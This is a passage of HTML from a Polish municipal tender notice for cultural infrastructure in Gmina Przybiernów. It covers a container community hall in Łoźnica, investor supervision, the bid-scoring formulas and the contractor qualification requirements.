zostanie obliczona poprzez zsumowanie wartości:<br/>Łączna wartość punktowa = wartość punktowa „C” (cena oferty) + wartość punktowa „G” (wydłużenie okresu gwarancji i rękojmi)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji i rękojmii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Poprawa infrastruktury kulturalnej w Gminie Przybiernów realizowana w częściach: Część nr 2 – Budowa świetlicy kontenerowej w Łoźnicy”<br/>Przedmiotem opracowania jest budowa świetlicy kontenerowej wraz z zagospodarowaniem terenu oraz niezbędną infrastrukturą techniczną w Łoźnicy oraz uzyskanie ostatecznego pozwolenia na użytkowanie obiektu.<br/>Zakres projektu dotyczy:<br/>- budowy budynku świetlicy z 6 modułów kontenerowych z dostosowaniem obiektu do korzystania osób niepełnosprawnych<br/>- obsługi komunikacyjnej obiektu w formie dojazdu do budynku z miejscami postojowymi, ciągami komunikacyjnymi oraz placem stycznym do przedmiotowego budynku<br/>- wydzielenia przestrzeni rekreacyjnych dla mieszkańców (plac zabaw z zestawami ogrodowymi do wypoczynku)<br/>- wydzielenia miejsca na gromadzenie odpadów stałych<br/>- wykonania ogrodzenia wokół terenu inwestycji<br/>- wykonania infrastruktury technicznej wewnątrz oraz na zewnątrz budynku wraz z oświetleniem zewnętrznym<br/><br/>Zestawienie pomieszczeń:<br/><br/>kondygnacja – parter/ H=2,50m<br/>Lp	Nr <br/>pomieszczenia	Nazwa pomieszczenia	Powierzchniam² <br/><br/>1	0.1	SALA 1	40,98<br/>2	0.2	SALA 2	27,13<br/>3	0.3	ZAPLECZE ŚWIETLICY	5,17<br/>4	0.4	TOALETA	10,22<br/><br/>RAZEM	81,10<br/>	<br/><br/>Parametry:<br/>Długość max. budynku – 14,63m<br/>Szerokość max. budynku – 6,06m<br/>Wys. budynku – max. 5,33m- kalenica, max.3,21m- okap<br/>Powierzchnia zabudowy - 89m2 <br/>Powierzchnia użytkowa – 81,10 m2<br/>Kubatura budynku ok. 203m³<br/>Wysokość kondygnacji: 2,50m </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44211100-3 - Budynki modułowe i przenośne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45311100-1 - Roboty w zakresie okablowania elektrycznego</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45314300-4 - Instalowanie infrastruktury okablowania</p> <p class="mb-0">45314310-7 - Układanie kabli</p> <p class="mb-0">45315700-5 - Instalowanie stacji rozdzielczych</p> <p class="mb-0">45317300-5 - Elektryczne elektrycznych urządzeń rozdzielczych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">380 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla Części nr 2<br/><br/>1)	cena oferty (C)	60%	60 punktów<br/>2)	wydłużenie okresu gwarancji i rękojmi (G)	40%	40 punktów<br/><br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie wszystkich kryterium =100 pkt.<br/><br/>W odniesieniu do wykonawców, których oferty nie podlegają odrzuceniu dokonana zostanie ocena oferty w następujący sposób:<br/><br/>ad. 1) Sposób obliczenia punktów dla kryterium cena oferty (C):<br/>W kryterium cena oferty największą liczbę punktów uzyska oferta z najniższą ceną (brutto).<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Cmin<br/>Wartość punktowa „C” = -------------------------------- x Max(C) <br/> Cbad<br/>gdzie: <br/>Cmin - cena brutto najniższa spośród wszystkich ofert<br/>Cbad - cena brutto podana w ofercie badanej<br/>Max(C) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium cena oferty (tj. 60 pkt)<br/><br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone kryterium otrzyma maksymalną ilość punktów. Pozostałym Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) ilość punktów.<br/><br/><br/>Ad 2) Sposób obliczenia punktów dla kryterium wydłużenie okresu gwarancji i rękojmi (G):<br/><br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/><br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawione niżej wzór w oparciu o zaoferowany okres gwarancji i rękojmi, który należy podać w miesiącach w formularzu ofertowym (zał. nr 1 do SWZ): <br/><br/> Gbad<br/>Wartość punktowa (G) = -------------------------------- x Max (G)<br/> Gmax<br/><br/>gdzie: <br/>Gmax – najdłuższy okres gwarancji i rękojmi spośród wszystkich ofert<br/>Gbad – okres gwarancji i rękojmi podany w ofercie badanej<br/>Max(G) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium wydłużenie okresu gwarancji i rękojmi (tj. 40 pkt)<br/><br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone kryterium otrzyma maksymalną ilość punktów. Pozostałym Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) ilość punktów.<br/><br/>Wymagany minimalny przez Zamawiającego okres gwarancji i rękojmi wynosi 60 miesięcy. Maksymalny okres gwarancji i rękojmi wynosi 84 miesięcy. <br/><br/><br/><br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 84 miesięcy do oceny ofert zostanie przyjęty okres 84 miesięcy. Brak wskazania w ofercie (w formularzu ofertowym) okresu gwarancji będzie równoznaczny z zaoferowaniem 60 miesięcy, za które Wykonawca otrzyma 0 pkt.<br/><br/>W przypadku gdy Wykonawca, który zaoferuje okres gwarancji krótszy niż 60 miesięcy oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp jako oferta, której treść jest niezgodna z warunkami zamówienia.<br/><br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>Łączna wartość punktowa = wartość punktowa „C” (cena oferty) + wartość punktowa „G” (wydłużenie okresu gwarancji i rękojmi)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji i rękojmii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Poprawa infrastruktury kulturalnej w Gminie Przybiernów realizowana w częściach: Część nr 3 – Nadzór inwestorski”<br/>5.4.	Szczegółowy przedmiot zamówienia dla poszczególnych części zamówienia określają zapisy treści SWZ w tym załączniki zawierające projektowane postanowienia przyszłej umowy oraz n/w załączniki do SWZ <br/><br/>a)	Załącznik nr 10 do SWZ – Dokumentacja projektowa dla części nr 1 – Termomodernizacja Czarnogłowy Projekt STWIORB<br/>b)	Załącznik nr 11 do SWZ – Dokumentacja projektowa dla części nr 1 – Termomodernizacja Brzozowo Projekt, STWIORB<br/>c)	Załącznik nr 12 do SWZ – Dokumentacja projektowa dla części nr 1 – Termomodernizacja Moracz Projekt STWIORB<br/>d)	Załącznik nr 13 do SWZ – Dokumentacja projektowa dla części nr 1 – Termomodernizacja Czarnogłowy, Brzozowo, Moracz Przedmiary <br/>e)	Załącznik nr 14 do SWZ – Dokumentacja projektowa dla części nr 1 – Rokita Projekt architektoniczno-budowlany<br/>f)	Załącznik nr 15 do SWZ – Dokumentacja projektowa dla części nr 1 – Rokita Branża konstrukcyjna STWIORB, przedmiar<br/>g)	Załącznik nr 16 do SWZ – Dokumentacja projektowa dla części nr 1 – Rokita branża elektryczna STWIORB, przedmiar<br/>h)	Załącznik nr 17 do SWZ – Dokumentacja projektowa dla części nr 1 – Rokita branża sanitarna STWIORB, przedmiar<br/>i)	Załącznik nr 18 do SWZ – Dokumentacja projektowa dla części nr 2 – Projekt Architektoniczno-Budowlany<br/>j)	Załącznik nr 19 do SWZ – Dokumentacja projektowa dla części nr 2 – Projekt Techniczny Konstrukcja, STWIORB, Przedmiar<br/>k)	Załącznik nr 20 do SWZ – Dokumentacja projektowa dla części nr 2 – Projekt Techniczny Elektryka, STWIORB, Przedmiar<br/>l)	Załącznik nr 21 do SWZ – Dokumentacja projektowa dla części nr 2 – Projekt Techniczny Sanitarny, STWIORB, Przedmiar<br/><br/>Załączniki określone w w/w punktach a) - l) określają dla części nr 1,2 zakres niezbędnych robót budowlanych celem realizacji przedmiotu zamówienia dla części 1,2 a dla części nr 3 zakres, który będzie przedmiotem nadzoru inwestorskiego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71247000-1 - Nadzór nad robotami budowlanymi</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">380 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla Części nr 3<br/><br/>1)	cena oferty (C)	60%	60 punktów<br/>2)	Doświadczenie inspektora o specjalności konstrukcyjnej	20%	20 punktów<br/>3)	Doświadczenie inspektora o specjalności sanitarnej	20%	20 punktów<br/><br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie wszystkich kryterium =100 pkt.<br/><br/>W odniesieniu do wykonawców, których oferty nie podlegają odrzuceniu dokonana zostanie ocena oferty w następujący sposób:<br/><br/><br/>ad. 1) Sposób obliczenia punktów dla kryterium cena oferty (C):<br/><br/><br/>W kryterium cena oferty największą liczbę punktów uzyska oferta z najniższą ceną (brutto).<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/> Cmin <br/>Wartość punktowa „C” = -------------------------------- x Max(C) <br/> Cbad<br/>gdzie: <br/>Cmin - cena brutto najniższa spośród wszystkich ofert<br/>Cbad - cena brutto podana w ofercie badanej<br/>Max(C) - maksymalna ilość punktów, jakie może otrzymać oferta za kryterium cena oferty (tj. 60 pkt)<br/><br/>Oferty będą oceniane w odniesieniu do najkorzystniejszych warunków przedstawionych przez Wykonawców w zakresie kryterium. Oferta wypełniająca w najwyższym stopniu wymagania określone kryterium otrzyma maksymalną ilość punktów. Pozostałym Wykonawcom, spełniającym wymagania kryterialne, przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) ilość punktów.<br/><br/><br/>Ad 2) Sposób obliczenia punktów dla kryterium doświadczenie inspektora o specjalności konstrukcyjnej (IK):<br/><br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 20,00 pkt.<br/><br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawiony niżej sposób tylko w sytuacji gdy wykonawca w ofercie wskaże odpowiednią osobę oświadczając/podając jednocześnie wielkość doświadczenia w latach:<br/><br/>1.	Za 3 letnie doświadczenie inspektora o specjalności konstrukcyjnej wykonawca uzyska - 5 pkt<br/>2. Za 6 letnie doświadczenie inspektora o specjalności konstrukcyjnej wykonawca uzyska - 10 pkt<br/>3.	Za 9 letnie doświadczenie inspektora o specjalności konstrukcyjnej wykonawca uzyska - 15 pkt<br/>4.	Za 12 letnie doświadczenie inspektora o specjalności konstrukcyjnej wykonawca uzyska - 20 pkt<br/><br/>Ad 3) Sposób obliczenia punktów dla kryterium doświadczenie inspektora o specjalności sanitarnej (IS):<br/><br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 20,00 pkt.<br/><br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawiony niżej sposób tylko w sytuacji gdy wykonawca w ofercie wskaże odpowiednią osobę oświadczając/podając jednocześnie wielkość doświadczenia w latach:<br/><br/>1.	Za 3 letnie doświadczenie inspektora o specjalności sanitarnej wykonawca uzyska - 5 pkt<br/>2.	Za 6 letnie doświadczenie inspektora o specjalności sanitarnej wykonawca uzyska - 10 pkt<br/>3.	Za 9 letnie doświadczenie inspektora o specjalności sanitarnej wykonawca uzyska - 15 pkt<br/>4.	Za 12 letnie doświadczenie inspektora o specjalności sanitarnej wykonawca uzyska - 20 pkt<br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>Łączna wartość punktowa = wartość punktowa „C” (cena oferty) + wartość punktowa „IK” + wartość punktowa „IS”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora o specjalności konstrukcyjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie inspektora o specjalności sanitarnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Część nr 1<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>3)	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>4) zdolności technicznej lub zawodowej<br/>a)	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie doświadczenia, tj. że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie co najmniej dwie roboty budowlane polegające na wykonaniu termomodernizacji budynku, tj. dociepleniu ścian każda o wartości robót budowlanych nie mniejszej niż 150 000,00 zł łącznie z podatkiem VAT (każda z tych robót). Przez jedną robotę Zamawiający rozumie zamówienie realizowane na podstawie jednej umowy,<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganych wartości porównywalnych.<br/>1.1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>a)	co najmniej jedną osobą pełniącą funkcję Kierownika Budowy - minimalne wymagania:<br/>kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi odpowiadające przedmiotowi zamówienia w specjalności inżynieryjnej konstrukcyjno budowlanej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlanelub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>b)	co najmniej jedną osobą pełniącą funkcję Kierownika Budowy - minimalne wymagania:<br/>kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi odpowiadające przedmiotowi zamówienia w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>c)	Co najmniej jedną osobą pełniącą funkcję Kierownika robót elektroenergetycznych - minimalne wymagania:<br/> kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń odpowiadające przedmiotowi zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów<br/>Połączenie stanowisk, o których mowa w ppkt 1.1 lit. a) – c) możliwe jest tylko pod warunkiem spełnienia łącznie wymagań dotyczących kwalifikacji. <br/>Część nr 2 <br/>4)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>5)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>6)	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>4) zdolności technicznej lub zawodowej<br/>a)	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie doświadczenia, tj. że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie co najmniej jedną robotę budowlaną polegającą na budowie lub/i przebudowie lub/i rozbudowie obiektu kubaturowego o kubaturze nie mniejszej niż 70 m² wraz z wykonaniem instalacji wewnętrznych (tj. elektryczną, wod. - kan., ogrzewania) oraz z wykonaniem instalacji zewnętrznych (tj. elektryczną, wod. – kan.) o wartości robót budowlanych nie mniejszej niż 300 000,00 zł łącznie z podatkiem VAT).<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganych wartości porównywalnych.<br/>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>a)	Kierownik budowy w specjalności konstrukcyjno-budowlanej – minimalne wymagania:<br/>	kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi odpowiadające przedmiotowi zamówienia w specjalności konstrukcyjno - budowlanej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>b)	Kierownik robót budowlanych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych – minimalne wymagania:<br/>	kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi odpowiadające przedmiotowi zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz. U. 2022 r. poz. 725 ze zm.) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>c)	Kierownik robót budowlanych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych – minimalne wymagania: <br/>	kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi odpowiadające przedmiotowi zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Część nr 3<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>3)	sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>4)	zdolności technicznej lub zawodowej<br/>a)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie doświadczenia tj., że: w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie: co najmniej dwie usługi polegające na nadzorowaniu robót budowlanych obejmujących swoim zakresem:<br/>budowę lub/i przebudowę lub/i rozbudowę obiektu kubaturowego o funkcji: socjalnej lub/i edukacyjnej lub/i opiekuńczej lub/i mieszkalnej lub/i biurowej wraz z wykonaniem instalacji wewnętrznych (elektrycznej, wod-kan.– każda z tych robót) o wartości co najmniej 200 000,00 zł każda.<br/>5)	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>a)	inspektor nadzoru robót budowlanych w specjalności inżynieryjnej konstrukcyjno-budowlanej – mini wym:<br/>- kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi odpowiadające przedmiotowi zamówienia w specjalności konstrukcyjno - budowlanej w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>b)	inspektor nadzoru robót budowlanych w specjalności sanitarnej – minimalne wymagania:<br/>- kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>c)	inspektor nadzoru robót budowlanych w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych – minimalne wymagania: kwalifikacje zawodowe: uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi odpowiadające przedmiotowi zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1 Do oferty Wykonawca<br/>zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1. oświadczenie o braku podstaw do wykluczenia z postępowania dla odpowiedniej części na którą Wykonawca składa ofertę -<br/>zgodnie z załącznikiem nr 3.1 do SWZ dla części nr 1, załącznikiem nr 3.2 do SWZ dla części nr 2, załącznikiem nr 3.3 do SWZ dla<br/>części nr 3,<br/>Oświadczenia, o którym mowa w pkt 14.1 SWZ, potwierdzające brak podstaw do wykluczenia, spełnianie warunków udziału w<br/>postępowaniu odpowiednio na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe.<br/>Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5<br/>dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na ich dzień złożenia.<br/>Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1. Dla wszystkich części - Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej<br/>grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z<br/>innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – z załącznikiem nr 8.1 do SWZ dla części nr 1, załącznikiem nr 8.2 do SWZ dla części nr<br/>2, załącznikiem nr 8.3 do SWZ dla części nr 3</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do<br/>oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:1) oświadczenia Wykonawcy o spełnianiu warunków<br/>udziału w postępowaniu dla odpowiedniej części na którą Wykonawca składa ofertę – 